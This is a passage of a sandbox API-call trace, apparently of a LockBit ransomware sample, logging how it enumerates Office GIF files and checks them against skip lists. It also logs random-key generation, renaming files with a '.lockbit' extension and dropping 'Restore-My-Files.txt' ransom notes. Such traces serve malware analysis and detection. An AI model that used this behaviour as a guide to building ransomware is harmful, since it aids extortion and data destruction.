lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.628] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF.lockbit") returned 78 [0204.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21422_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.630] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.630] malloc (_Size=0x40068) returned 0x3df0008 [0204.630] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=257) returned 1 [0204.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.631] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.635] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.635] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.635] free (_Block=0x1fa2ed8) [0204.635] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.636] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.636] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.636] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf7de00, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbf7de00, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21423_.GIF", cAlternateFileName="")) returned 1 [0204.636] lstrcmpiW (lpString1=".", lpString2="BD21423_.GIF") returned -1 [0204.636] lstrcmpiW (lpString1="..", lpString2="BD21423_.GIF") returned -1 [0204.636] PathFindExtensionW (pszPath="BD21423_.GIF") returned=".GIF" [0204.636] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.636] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.636] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.637] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.637] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.637] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.637] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.637] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.637] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.638] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.638] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.638] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21423_.GIF") returned 1 [0204.638] lstrcmpiW (lpString1="ntldr", lpString2="BD21423_.GIF") returned 1 [0204.638] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21423_.GIF") returned 1 [0204.638] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21423_.GIF") returned 1 [0204.638] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21423_.GIF") returned -1 [0204.638] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21423_.GIF") returned 1 [0204.638] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21423_.GIF") returned 1 [0204.638] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.638] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF") returned=".GIF" [0204.638] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.638] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.638] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.638] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.639] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.639] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF.lockbit") returned 78 [0204.639] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21423_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.645] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.645] malloc (_Size=0x40068) returned 0x3df0008 [0204.645] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=233) returned 1 [0204.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.646] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.651] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.651] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.651] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.651] free (_Block=0x1fa2ed8) [0204.651] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.651] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.651] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c65a00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x91c65a00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21433_.GIF", cAlternateFileName="")) returned 1 [0204.651] lstrcmpiW (lpString1=".", lpString2="BD21433_.GIF") returned -1 [0204.651] lstrcmpiW (lpString1="..", lpString2="BD21433_.GIF") returned -1 [0204.651] PathFindExtensionW (pszPath="BD21433_.GIF") returned=".GIF" [0204.651] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.651] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.651] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.651] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.651] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.652] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.652] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.652] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.652] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.652] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.652] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.652] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21433_.GIF") returned 1 [0204.653] lstrcmpiW (lpString1="ntldr", lpString2="BD21433_.GIF") returned 1 [0204.653] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21433_.GIF") returned 1 [0204.653] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21433_.GIF") returned 1 [0204.653] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21433_.GIF") returned -1 [0204.653] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21433_.GIF") returned 1 [0204.653] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21433_.GIF") returned 1 [0204.653] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.653] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF") returned=".GIF" [0204.653] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.653] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.653] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.654] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.654] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.654] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.654] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.654] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.654] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.654] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.654] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF.lockbit") returned 78 [0204.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21433_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.656] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.656] malloc (_Size=0x40068) returned 0x3df0008 [0204.656] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0204.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.657] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.661] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.661] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.661] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.662] free (_Block=0x1fa2ed8) [0204.662] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.662] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.662] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c65a00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbcead480, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x91c65a00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21434_.GIF", cAlternateFileName="")) returned 1 [0204.662] lstrcmpiW (lpString1=".", lpString2="BD21434_.GIF") returned -1 [0204.662] lstrcmpiW (lpString1="..", lpString2="BD21434_.GIF") returned -1 [0204.662] PathFindExtensionW (pszPath="BD21434_.GIF") returned=".GIF" [0204.662] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.662] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.662] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.663] lstrcmpiW (lpString1=".mod", 